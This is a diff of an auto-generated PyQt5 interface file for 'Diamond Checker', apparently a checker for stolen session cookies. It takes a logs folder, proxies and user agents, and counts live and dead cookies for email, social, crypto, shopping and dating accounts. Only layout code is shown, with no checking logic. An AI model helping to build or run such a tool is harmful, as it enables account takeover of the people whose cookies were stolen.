self.kleinanzeigen_checkbox.setEnabled(False) - self.kleinanzeigen_checkbox.setObjectName("kleinanzeigen_checkbox") - self.gridLayout_2.addWidget(self.kleinanzeigen_checkbox, 1, 1, 1, 1) - self.booking_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.booking_checkbox.setEnabled(False) - self.booking_checkbox.setObjectName("booking_checkbox") - self.gridLayout_2.addWidget(self.booking_checkbox, 1, 2, 1, 1) - self.uber_eats_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.uber_eats_checkbox.setEnabled(False) - self.uber_eats_checkbox.setObjectName("uber_eats_checkbox") - self.gridLayout_2.addWidget(self.uber_eats_checkbox, 1, 3, 1, 1) - self.dh_gate_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.dh_gate_checkbox.setEnabled(False) - self.dh_gate_checkbox.setObjectName("dh_gate_checkbox") - self.gridLayout_2.addWidget(self.dh_gate_checkbox, 1, 4, 1, 1) - self.checkBox_humble = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_humble.setFont(font) - self.checkBox_humble.setStyleSheet("") - self.checkBox_humble.setObjectName("checkBox_humble") - self.gridLayout_2.addWidget(self.checkBox_humble, 2, 0, 1, 1) - self.temu_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.temu_checkbox.setEnabled(False) - self.temu_checkbox.setObjectName("temu_checkbox") - self.gridLayout_2.addWidget(self.temu_checkbox, 2, 1, 1, 1) - self.fiverr_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.fiverr_checkbox.setEnabled(False) - self.fiverr_checkbox.setObjectName("fiverr_checkbox") - self.gridLayout_2.addWidget(self.fiverr_checkbox, 2, 2, 1, 1) - self.zillow_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.zillow_checkbox.setEnabled(False) - self.zillow_checkbox.setObjectName("zillow_checkbox") - self.gridLayout_2.addWidget(self.zillow_checkbox, 2, 3, 1, 1) - self.instacart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.instacart_checkbox.setEnabled(False) - self.instacart_checkbox.setObjectName("instacart_checkbox") - self.gridLayout_2.addWidget(self.instacart_checkbox, 2, 4, 1, 1) - self.google_play_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.google_play_checkbox.setObjectName("google_play_checkbox") - self.gridLayout_2.addWidget(self.google_play_checkbox, 3, 0, 1, 1) - self.vinted_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.vinted_checkbox.setEnabled(False) - self.vinted_checkbox.setObjectName("vinted_checkbox") - self.gridLayout_2.addWidget(self.vinted_checkbox, 3, 1, 1, 1) - self.walmart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.walmart_checkbox.setEnabled(False) - self.walmart_checkbox.setObjectName("walmart_checkbox") - self.gridLayout_2.addWidget(self.walmart_checkbox, 3, 2, 1, 1) - self.inbox_tab_widget.addTab(self.shopping_tab, "") - self.daiting_tab = QtWidgets.QWidget() - self.daiting_tab.setObjectName("daiting_tab") - self.widget4 = QtWidgets.QWidget(self.daiting_tab) - self.widget4.setGeometry(QtCore.QRect(20, 0, 751, 221)) - self.widget4.setObjectName("widget4") - self.gridLayout_5 = QtWidgets.QGridLayout(self.widget4) - self.gridLayout_5.setContentsMargins(0, 0, 0, 0) - self.gridLayout_5.setObjectName("gridLayout_5") - self.ashley_madison_checkbox = QtWidgets.QCheckBox(self.widget4) - self.ashley_madison_checkbox.setEnabled(False) - self.ashley_madison_checkbox.setObjectName("ashley_madison_checkbox") - self.gridLayout_5.addWidget(self.ashley_madison_checkbox, 0, 0, 1, 1) - self.zoosk_checkbox = QtWidgets.QCheckBox(self.widget4) - self.zoosk_checkbox.setEnabled(False) - self.zoosk_checkbox.setObjectName("zoosk_checkbox") - self.gridLayout_5.addWidget(self.zoosk_checkbox, 0, 1, 1, 1) - self.meetme_checkbox = QtWidgets.QCheckBox(self.widget4) - self.meetme_checkbox.setEnabled(False) - self.meetme_checkbox.setObjectName("meetme_checkbox") - self.gridLayout_5.addWidget(self.meetme_checkbox, 0, 2, 1, 1) - self.eharmony_checkbox = QtWidgets.QCheckBox(self.widget4) - self.eharmony_checkbox.setEnabled(False) - self.eharmony_checkbox.setObjectName("eharmony_checkbox") - self.gridLayout_5.addWidget(self.eharmony_checkbox, 1, 0, 1, 1) - self.tinder_checkbox = QtWidgets.QCheckBox(self.widget4) - self.tinder_checkbox.setEnabled(False) - self.tinder_checkbox.setObjectName("tinder_checkbox") - self.gridLayout_5.addWidget(self.tinder_checkbox, 1, 1, 1, 1) - self.christan_mingle_checkbox = QtWidgets.QCheckBox(self.widget4) - self.christan_mingle_checkbox.setEnabled(False) - self.christan_mingle_checkbox.setObjectName("christan_mingle_checkbox") - self.gridLayout_5.addWidget(self.christan_mingle_checkbox, 1, 2, 1, 1) - self.inbox_tab_widget.addTab(self.daiting_tab, "") - self.number_of_label = QtWidgets.QLabel(self.centralwidget) - self.number_of_label.setGeometry(QtCore.QRect(540, 280, 71, 31)) - self.number_of_label.setObjectName("number_of_label") - self.files_label = QtWidgets.QLabel(self.centralwidget) - self.files_label.setGeometry(QtCore.QRect(540, 310, 71, 31)) - self.files_label.setObjectName("files_label") - self.folders_label = QtWidgets.QLabel(self.centralwidget) - self.folders_label.setGeometry(QtCore.QRect(540, 340, 71, 31)) - self.folders_label.setObjectName("folders_label") - self.cookies_label = QtWidgets.QLabel(self.centralwidget) - self.cookies_label.setGeometry(QtCore.QRect(540, 380, 71, 21)) - self.cookies_label.setObjectName("cookies_label") - self.cookie_stats_label = QtWidgets.QLabel(self.centralwidget) - self.cookie_stats_label.setGeometry(QtCore.QRect(700, 290, 81, 21)) - self.cookie_stats_label.setObjectName("cookie_stats_label") - self.live_label = QtWidgets.QLabel(self.centralwidget) - self.live_label.setGeometry(QtCore.QRect(700, 320, 71, 21)) - self.live_label.setObjectName("live_label") - self.dead_label = QtWidgets.QLabel(self.centralwidget) - self.dead_label.setGeometry(QtCore.QRect(700, 350, 71, 21)) - self.dead_label.setObjectName("dead_label") - self.errors_label = QtWidgets.QLabel(self.centralwidget) - self.errors_label.setGeometry(QtCore.QRect(700, 380, 71, 21)) - self.errors_label.setObjectName("errors_label") - self.stats_box.raise_() - self.lineEdit_dir.raise_() - self.lineEdit_proxy.raise_() - self.lineEdit_ua.raise_() - self.checkBox_ua.raise_() - self.label_2.raise_() - self.pushButton.raise_() - self.progressBar.raise_() - self.pushButton_dir_logs.raise_() - self.pushButton_proxies_files.raise_() - self.pushButton_useragents_file.raise_() - self.textEdit_console.raise_() - self.social_network_label.raise_() - self.spinBox_thr.raise_() - self.label_lgbt.raise_() - self.comboBox_proxy.raise_() - self.inbox_tab_widget.raise_() - self.number_of_label.raise_() - self.files_label.raise_() - self.folders_label.raise_() - self.cookies_label.raise_() - self.cookie_stats_label.raise_() - self.live_label.raise_() - self.dead_label.raise_() - self.errors_label.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.statusbar = QtWidgets.QStatusBar(MainWindow) - self.statusbar.setObjectName("statusbar") - MainWindow.setStatusBar(self.statusbar) - - self.retranslateUi(MainWindow) - self.inbox_tab_widget.setCurrentIndex(0) - self.pushButton_proxies_files.clicked.connect(MainWindow.proxies_file) # type: ignore - self.pushButton_dir_logs.clicked.connect(MainWindow.dir_logs) # type: ignore - self.pushButton_useragents_file.clicked.connect(MainWindow.useragents_file) # type: ignore - QtCore.QMetaObject.connectSlotsByName(MainWindow) - - def retranslateUi(self, MainWindow): - _translate = QtCore.QCoreApplication.translate - MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) - self.lineEdit_dir.setText(_translate("MainWindow", "The path to the logs")) - self.lineEdit_proxy.setText(_translate("MainWindow", "The path to the proxy")) - self.lineEdit_ua.setText(_translate("MainWindow", "The path to user agents")) - self.checkBox_ua.setText(_translate("MainWindow", "Enable")) - self.pushButton.setText(_translate("MainWindow", "Start")) - self.pushButton_dir_logs.setText(_translate("MainWindow", "Choose a path")) - self.pushButton_proxies_files.setText(_translate("MainWindow", "Choose a path")) - self.pushButton_useragents_file.setText(_translate("MainWindow", "Choose a path")) - self.textEdit_console.setHtml(_translate("MainWindow", "\n" -"\n" -"


")) - self.textEdit_console.setPlaceholderText(_translate("MainWindow", "Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project")) - self.social_network_label.setText(_translate("MainWindow", "Threads")) - self.comboBox_proxy.setItemText(0, _translate("MainWindow", "off")) - self.comboBox_proxy.setItemText(1, _translate("MainWindow", "socks4")) - self.comboBox_proxy.setItemText(2, _translate("MainWindow", "socks5")) - self.comboBox_proxy.setItemText(3, _translate("MainWindow", "http")) - self.gmail_inbox_checkbox.setText(_translate("MainWindow", "Gmail")) - self.yandex_checkbox.setText(_translate("MainWindow", "Yandex")) - self.yahoo_checkbox.setText(_translate("MainWindow", "Yahoo")) - self.outlook_checkbox.setText(_translate("MainWindow", "Outlook")) - self.webmail_checkbox.setText(_translate("MainWindow", "Webmail")) - self.mailru_checkbox.setText(_translate("MainWindow", "Mail.Ru")) - self.cpanel_checkbox.setText(_translate("MainWindow", "Cpanel")) - self.office_checkbox.setText(_translate("MainWindow", "Office")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.inbox_tab), _translate("MainWindow", "Inbox")) - self.bing_ads_checkbox.setText(_translate("MainWindow", "Bing Ads")) - self.reddit_ads__checkbox.setText(_translate("MainWindow", "Reddit Ads")) - self.ahref_checkbox.setText(_translate("MainWindow", "AHref SEO")) - self.snapchat_ads_checkbox.setText(_translate("MainWindow", "Snapchat Ads")) - self.tinder_ads_checkbox.setText(_translate("MainWindow", "Tinder Ads")) - self.twitter_ads_checkbox.setText(_translate("MainWindow", "Twitter Ads")) - self.sem_rush_checkbox.setText(_translate("MainWindow", "SEM Rush")) - self.craigslist_ads_checkbox.setText(_translate("MainWindow", "Craigslist Ads")) - self.facebookads__checkbox.setText(_translate("MainWindow", "Facebook Ads")) - self.microsoft_ads_checkbox.setText(_translate("MainWindow", "Microsoft Ads")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.ads_tab), _translate("MainWindow", "Ads")) - self.checkBox_steam.setText(_translate("MainWindow", "Steam")) - self.checkBox_pathofexile.setText(_translate("MainWindow", "PathofExile")) - self.checkBox_roblox.setText(_translate("MainWindow", "Roblox")) - self.checkBox_battlenet.setText(_translate("MainWindow", "BattleNet")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.game_tab), _translate("MainWindow", "Games")) - self.checkBox_instagram.setText(_translate("MainWindow", "Instagram")) - self.myspace_checkbox.setText(_translate("MainWindow", "Myspace")) - self.reddit_checkbox.setText(_translate("MainWindow", "Reddit")) - self.linkedin_checkbox.setText(_translate("MainWindow", "LinkedIn")) - self.checkBox_discord.setText(_translate("MainWindow", "Discord")) - self.kick_checkbox.setText(_translate("MainWindow", "Kick")) - self.checkBox_facebook_ads.setText(_translate("MainWindow", "Facebook")) - self.checkBox_tiktok.setText(_translate("MainWindow", "TikTok")) - self.twitch_checkbox.setText(_translate("MainWindow", "Twitch")) - self.pintrest_checkbox.setText(_translate("MainWindow", "Pintrest")) - self.checkBox_youtube.setText(_translate("MainWindow", "YouTube")) - self.vimeo_checkbox.setText(_translate("MainWindow", "Vimeo")) - self.rumble_checkbox.setText(_translate("MainWindow", "Rumble")) - self.localsapp_checkbox.setText(_translate("MainWindow", "Locals")) - self.snapchat_checkbox.setText(_translate("MainWindow", "Snapchat")) - self.patreon_checkbox.setText(_translate("MainWindow", "Patreon")) - self.checkBox_netflix.setText(_translate("MainWindow", "Netflix")) - self.checkBox_vk.setText(_translate("MainWindow", "VK")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.social_network_tab), _translate("MainWindow", "Social network")) - self.checkBox_coinbase.setText(_translate("MainWindow", "CoinBase")) - self.checkBox_kryptex.setText(_translate("MainWindow", "Kryptex")) - self.checkBox_hitbtc.setText(_translate("MainWindow", "HitBTC")) - self.checkBox_freebitcoin.setText(_translate("MainWindow", "FreeBitcoin")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.crypto_wallets_tab), _translate("MainWindow", "Crypto wallet")) - self.checkBox_amazon.setText(_translate("MainWindow", "Amazon")) - self.ebay_checkbox.setText(_translate("MainWindow", "Ebay")) - self.airbnb_checkbox.setText(_translate("MainWindow", "AirBNB")) - self.envato_checkbox.setText(_translate("MainWindow", "Envato Elements")) - self.flipkart_checkbox.setText(_translate("MainWindow", "Flipkart")) - self.checkBox_funpay.setText(_translate("MainWindow", "FunPay")) - self.kleinanzeigen_checkbox.setText(_translate("MainWindow", "Kleinanzeigen")) - self.booking_checkbox.setText(_translate("MainWindow", "Booking.com")) - self.uber_eats_checkbox.setText(_translate("MainWindow", "Uber Eats")) - self.dh_gate_checkbox.setText(_translate("MainWindow", "DH Gate")) - self.checkBox_humble.setText(_translate("MainWindow", "Humble")) - self.temu_checkbox.setText(_translate("MainWindow", "Temu")) - self.fiverr_checkbox.setText(_translate("MainWindow", "Fiverr")) - self.zillow_checkbox.setText(_translate("MainWindow", "Zillow")) - self.instacart_checkbox.setText(_translate("MainWindow", "Instacart")) - self.google_play_checkbox.setText(_translate("MainWindow", "Google Play")) - self.vinted_checkbox.setText(_translate("MainWindow", "Vinted")) - self.walmart_checkbox.setText(_translate("MainWindow", "Walmart")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.shopping_tab), _translate("MainWindow", "Shop")) - self.ashley_madison_checkbox.setText(_translate("MainWindow", "AshleyMaddison")) - self.zoosk_checkbox.setText(_translate("MainWindow", "Zoosk")) - self.meetme_checkbox.setText(_translate("MainWindow", "MeetMe")) - self.eharmony_checkbox.setText(_translate("MainWindow", "EHarmony")) - self.tinder_checkbox.setText(_translate("MainWindow", "Tinder")) - self.christan_mingle_checkbox.setText(_translate("MainWindow", "ChristanMingle")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.daiting_tab), _translate("MainWindow", "Daiting")) - self.number_of_label.setText(_translate("MainWindow", "Number of:")) - self.files_label.setText(_translate("MainWindow", "Files:")) - self.folders_label.setText(_translate("MainWindow", "Folders:")) - self.cookies_label.setText(_translate("MainWindow", "Cookies:")) - self.cookie_stats_label.setText(_translate("MainWindow", "Cookie Stats:")) - self.live_label.setText(_translate("MainWindow", "Live:")) - self.dead_label.setText(_translate("MainWindow", "Dead:")) - self.errors_label.setText(_translate("MainWindow", "Errors:")) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) +# -*- coding: utf-8 -*- + +# Form implementation generated from reading ui file 'main_ui.ui' +# +# Created by: PyQt5 UI code generator 5.15.9 +# +# WARNING: Any manual changes made to this file will be lost when pyuic5 is +# run again. Do not edit this file unless you know what you are doing. + + +from PyQt5 import QtCore, QtGui, QtWidgets + + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName("MainWindow") + MainWindow.resize(801, 820) + MainWindow.setMinimumSize(QtCore.QSize(801, 677)) + MainWindow.setMaximumSize(QtCore.QSize(801, 999)) + MainWindow.setSizeIncrement(QtCore.QSize(801, 677)) + MainWindow.setBaseSize(QtCore.QSize(801, 677)) + MainWindow.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.centralwidget = QtWidgets.QWidget(MainWindow) + self.centralwidget.setObjectName("centralwidget") + self.lineEdit_dir = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_dir.setGeometry(QtCore.QRect(10, 280, 421, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_dir.setFont(font) + self.lineEdit_dir.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_dir.setObjectName("lineEdit_dir") + self.lineEdit_proxy = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_proxy.setGeometry(QtCore.QRect(10, 320, 331, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_proxy.setFont(font) + self.lineEdit_proxy.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_proxy.setObjectName("lineEdit_proxy") + self.lineEdit_ua = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_ua.setGeometry(QtCore.QRect(10, 360, 331, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_ua.setFont(font) + self.lineEdit_ua.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_ua.setObjectName("lineEdit_ua") + self.checkBox_ua = QtWidgets.QCheckBox(self.centralwidget) + self.checkBox_ua.setGeometry(QtCore.QRect(440, 360, 81, 31)) + font = QtGui.QFont() + font.setFamily("MS Shell Dlg 2") + font.setPointSize(9) + font.setBold(True) + self.checkBox_ua.setFont(font) + self.checkBox_ua.setStyleSheet("color: #c8c8c8") + self.checkBox_ua.setObjectName("checkBox_ua") + self.label_2 = QtWidgets.QLabel(self.centralwidget) + self.label_2.setGeometry(QtCore.QRect(10, 740, 601, 51)) + self.label_2.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.label_2.setText("") + self.label_2.setObjectName("label_2") + self.pushButton = QtWidgets.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(620, 740, 171, 51)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(12) + self.pushButton.setFont(font) + self.pushButton.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.pushButton.setObjectName("pushButton") + self.progressBar = QtWidgets.QProgressBar(self.centralwidget) + self.progressBar.setGeometry(QtCore.QRect(180, 750, 421, 31)) + self.progressBar.setStyleSheet("background-color: #181818;\n" +"border: 3px solid #363636;\n" +"color: #c8c8c8") + self.progressBar.setProperty("value", 24) + self.progressBar.setTextVisible(False) + self.progressBar.setOrientation(QtCore.Qt.Horizontal) + self.progressBar.setInvertedAppearance(False) + self.progressBar.setObjectName("progressBar") + self.pushButton_dir_logs = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_dir_logs.setGeometry(QtCore.QRect(430, 280, 91, 31)) + self.pushButton_dir_logs.setStyleSheet("") + self.pushButton_dir_logs.setObjectName("pushButton_dir_logs") + self.pushButton_proxies_files = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_proxies_files.setGeometry(QtCore.QRect(340, 320, 91, 31)) + self.pushButton_proxies_files.setStyleSheet("") + self.pushButton_proxies_files.setObjectName("pushButton_proxies_files") + self.pushButton_useragents_file = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_useragents_file.setGeometry(QtCore.QRect(340, 360, 91, 31)) + self.pushButton_useragents_file.setStyleSheet("") + self.pushButton_useragents_file.setObjectName("pushButton_useragents_file") + self.textEdit_console = QtWidgets.QTextEdit(self.centralwidget) + self.textEdit_console.setGeometry(QtCore.QRect(10, 20, 781, 251)) + self.textEdit_console.setStyleSheet("background-color: #181818;\n" +"border: 3px solid #363636;\n" +"color: #c8c8c8") + self.textEdit_console.setObjectName("textEdit_console") + self.social_network_label = QtWidgets.QLabel(self.centralwidget) + self.social_network_label.setGeometry(QtCore.QRect(10, 740, 161, 51)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.social_network_label.setFont(font) + self.social_network_label.setStyleSheet("") + self.social_network_label.setObjectName("social_network_label") + self.spinBox_thr = QtWidgets.QSpinBox(self.centralwidget) + self.spinBox_thr.setGeometry(QtCore.QRect(90, 750, 71, 31)) + font = QtGui.QFont() + font.setFamily("Impact") + font.setPointSize(10) + self.spinBox_thr.setFont(font) + self.spinBox_thr.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.spinBox_thr.setObjectName("spinBox_thr") + self.label_lgbt = QtWidgets.QLabel(self.centralwidget) + self.label_lgbt.setGeometry(QtCore.QRect(0, 0, 801, 5)) + self.label_lgbt.setText("") + self.label_lgbt.setScaledContents(True) + self.label_lgbt.setObjectName("label_lgbt") + self.comboBox_proxy = QtWidgets.QComboBox(self.centralwidget) + self.comboBox_proxy.setGeometry(QtCore.QRect(440, 320, 71, 21)) + font = QtGui.QFont() + font.setFamily("MS Sans Serif") + font.setPointSize(10) + self.comboBox_proxy.setFont(font) + self.comboBox_proxy.setStyleSheet("") + self.comboBox_proxy.setObjectName("comboBox_proxy") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.stats_box = QtWidgets.QLabel(self.centralwidget) + self.stats_box.setGeometry(QtCore.QRect(530, 280, 261, 131)) + font = QtGui.QFont() + font.setFamily("Impact") + font.setPointSize(12) + self.stats_box.setFont(font) + self.stats_box.setStyleSheet("") + self.stats_box.setText("") + self.stats_box.setObjectName("stats_box") + self.inbox_tab_widget = QtWidgets.QTabWidget(self.centralwidget) + self.inbox_tab_widget.setGeometry(QtCore.QRect(10, 430, 781, 281)) + font = QtGui.QFont() + font.setFamily("Furore") + self.inbox_tab_widget.setFont(font) + self.inbox_tab_widget.setFocusPolicy(QtCore.Qt.TabFocus) + self.inbox_tab_widget.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu) + 